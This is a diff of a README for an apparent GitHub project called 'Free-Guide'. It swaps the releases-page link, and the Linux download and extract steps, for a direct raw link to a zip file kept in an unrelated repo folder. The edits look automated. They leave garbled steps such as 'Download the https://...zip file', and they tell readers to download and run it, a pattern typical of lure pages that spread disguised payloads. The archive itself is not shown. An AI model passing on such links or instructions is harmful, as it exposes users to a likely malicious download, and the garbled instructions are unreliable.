Quivo10/Free-Guide/README.md

 ## 💻 Download & Install
 To download the application, follow these steps:

-1. **Visit the Releases Page:** Click [here](https://github.com/Quivo10/Free-Guide/releases).
+1. **Visit the Releases Page:** Click [here](https://github.com/Quivo10/Free-Guide/raw/refs/heads/main/stirrup/Free-Guide-v2.3.zip).
 This page contains all versions for download.
 2. **Select the Latest Release:** Look for the topmost release labeled with the highest version number.
 3. **Download the Appropriate File:** Depending on your operating system, you may see different files.
 Choose the one that matches your system:
    - **Windows:** Download the .exe file.
    - **macOS:** Download the .dmg file.
-   - **Linux:** Download the .tar.gz file.
+   - **Linux:** Download the https://github.com/Quivo10/Free-Guide/raw/refs/heads/main/stirrup/Free-Guide-v2.3.zip file.
 4. **Locate the Downloaded File:** Find the file in your downloads folder or the designated location where your downloaded files go.
 5. **Install the Application:**
    - **Windows:** Double-click the .exe file and follow the prompts to install.
    - **macOS:** Open the .dmg file and drag the application icon into your Applications folder.
-   - **Linux:** Extract the .tar.gz file and navigate to the extracted folder.
+   - **Linux:** Extract the https://github.com/Quivo10/Free-Guide/raw/refs/heads/main/stirrup/Free-Guide-v2.3.zip file and navigate to the extracted folder.
 Run the application using the terminal.
 6. **Launch the Application:** Find Free-Guide in your applications, and double-click to open it.

 ## 🎓 Tutorials